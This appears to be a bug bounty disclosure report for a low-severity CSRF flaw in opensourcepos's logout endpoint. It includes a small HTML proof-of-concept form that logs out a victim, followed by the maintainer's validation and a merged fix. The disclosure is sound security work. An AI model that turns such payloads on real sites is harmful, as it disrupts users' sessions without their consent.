Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Dec 23rd 2021


Description

CSRF on logout functionality. Attacker able to logout the user by sending malicious link

Proof of Concept

<!DOCTYPE html>

<html>

<body>

<form method="GET" action="https://dev.opensourcepos.org:443/home/logout">

    <input type="text" name="csrf_cookie_ospos_v3" value="b733af2ee56ba0678b8817af620a02d9">

    <input type="text" name="ospos_session" value="0ba22e9026f4c7c24749ebab3dc6ccea38acd43f">

    <input type="submit" value="Send">

</form>

</body>

</html>

Impact

This vulnerability is capable of logout the user session

Note

This is not an attack, it is a kind of annoyance to the user , though it is a valid csrf . By Using post method + csrf token to avoid this

We are processing your report and will contact the opensourcepos team within 24 hours. a month ago
We have contacted a member of the opensourcepos team and are waiting to hear back a month ago
We have sent a follow up to the opensourcepos team. We will try again in 7 days. a month ago
jekkos validated this vulnerability a month ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos
a month ago

Maintainer


I think this one is rather low severity, maybe some kind of DoS attack can be tricked this way which could be annoying for a user. But beside that the impact is rather low.

jekkos confirmed that a fix has been merged on 9332d1 a month ago
jekkos has been awarded the fix bounty